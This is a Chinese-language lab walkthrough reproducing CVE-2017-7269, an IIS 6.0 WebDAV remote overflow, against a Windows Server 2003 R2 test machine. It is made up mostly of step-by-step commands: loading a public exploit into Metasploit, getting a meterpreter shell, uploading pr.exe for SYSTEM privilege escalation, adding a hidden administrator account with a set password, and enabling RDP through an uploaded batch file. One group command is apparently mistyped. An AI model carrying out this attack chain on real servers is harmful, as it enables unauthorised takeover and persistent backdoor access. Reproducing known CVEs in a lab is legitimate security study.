CVE-2017-7269-iis遠程溢出漏洞復現

##01漏洞描述

cve_2017_7269漏洞屬於高危漏洞，是由Zhiniang Peng和Chen Wu（華南理工大學信息安全實驗室,計算機科學與工程學院）發現的。IIS 6.0開啟Webdav服務的服務器被爆存在緩存區溢出漏洞導致遠程代碼隨意執行，目前針對 Windows Server 2003 R2 可以穩定利用。

 

下面開始復現cve_2017_7269 漏洞，拿下windows 2003 R2權限，並遠程登錄服務器：

##02靶機實驗環境
目標主機：Windows Server 2003 R2
鏡像下載：種子文件用迅雷下載: ed2k://|file|cn_win_srv_2003_r2_enterprise_with_sp2_vl_cd1_X13-46432.iso|637917184|284DC0E76945125035B9208B9199E465|/
IP：192.168.1.104

A.安裝IIS6.0服務：

 

 

B.打開WebDAV服務拓展：

 

攻擊機：kali Linux
鏡像下載：https://www.kali.org/downloads/
IP:192.168.1.106

 

##03配置攻擊套件
--首先我們要下載EXP文件，輸入：

>git clone https://github.com/zcgonvh/cve-2017-7269 //下載EXP > ls //查看當前目錄下的文件

 

 

--然后我們需要復制EXP到msf框架中#注意復制時下划線不要寫成cve-2017-7269.rb#，在目錄下重命名這個文件為cve_2017_7269.rb，輸入：

>cp cve_2017_7269.rb /usr/share/metasploit-framework/modules/exploits/windows/iis/  //復制EXP到相應目錄 > cd /usr/share/metasploit-framework/modules/exploits/windows/iis/  //進入目錄
>ls //查看當前目錄下的文件

 

 

--我們使用nmap掃描一下靶機的端口情況，輸入：

>nmap 192.168.1.104  //掃描192.168.1.104的端口

#可以看到我們要攻擊的80端口已經開啟#

 

##04利用Metasploit開始攻擊
打開Metasploit

--然后我們要使用剛才復制進去的EXP套件
輸入：

msf5 > use exploit/windows/iis/cve_2017_7269 //使用此套件

 

msf5 > show options //查看需要的配置

發現只需要配置RHOSTS(目標IP)，最好把RPORT(目標端口)也配置下

msf5 > set rhosts 192.168.1.104 // 設置目標的IP msf5 > set rport 80 //設置目標端口

 

--最后執行攻擊

msf5 > exploit

拿到了meterpreter！

 

 

##05進行提權

我們輸入：

meterpreter >shell //建立交互拿到目標shell，進入命令行界面 meterpreter >whoami //查看當前用戶權限,whoami，發現只是個普通用戶權限

 

--我們嘗試創建一個新目錄(發現當前用戶權限創建失敗了)

c:\windows\system32\inetsrv>md 555 //創建555目錄文件

--我們進入到C盤的根目錄，創建yhs目錄文件發現成功了，注意#實際情況就得慢慢試了#

c:\windows\system32\inetsrv>cd c:\

 

--然后輸入exit命令回到metepreter>,用upload命令上傳Pr.exe文件到剛才創建的yhs目錄下，輸入：

meterpreter > upload '/root/pr.exe ' c:\\yhs //上傳文件，使用的是絕對路徑

 

--接下來我們借助提權工具pr.exe進行提權進行下一步后滲透操作
利用pr.exe，輸入:

C:\yhs>pr.exe "whoami" //利用提權工具查看當前用戶權限

#可以看到成功的拿下了system最高權限#

 

--我們創建用戶yhs用來遠程登錄服務器，輸入：

C:\yhs>pr.exe "net user yhs lovegyw /add" //創建yhs用戶，密碼是lovegyw

--查看用戶列表，輸入：

C:\yhs>net user //查看用戶列表發現yhs創建成功

 

--將yhs用戶加入到Administrators組里面，輸入：

C:\yhs>pr.exe "net localhost administrators yhs /add" //將yhs加入到管理員組

##06遠程登錄服務器
用戶創建成功了，我們怎樣遠程登錄到目標服務器呢，我們需要再上傳一個3389.bat到c:\\yhs目錄下，利用pr.exe運行，打開目標服務器的3389端口，實現遠程登錄，輸入：

meterpreter > upload '/root/3389.bat ' c:\\yhs  //上傳文件，使用的是絕對路徑

 

--然后我們回到c:\\yhs目錄，輸入：

C:\yhs>pr.exe "call 3389.bat" //啟動bat開啟服務器3389端口

 

--再次使用nmap掃描一下服務器端口是否成功打開，輸入：

>nmap 192.168.1.104  // 掃描192.168.1.104的端口

 

--發現3389成功打開，我們就可以實施遠程登錄服務器的操作了，打開終端窗口輸入：

>rdesktop 192.168.1.104 //使用命令打開遠程登錄窗口

 

--然后在遠程登錄窗口填入剛才創建的yhs用戶的賬號密碼，輸入界面：

--然后敲下回車鍵，Succesful！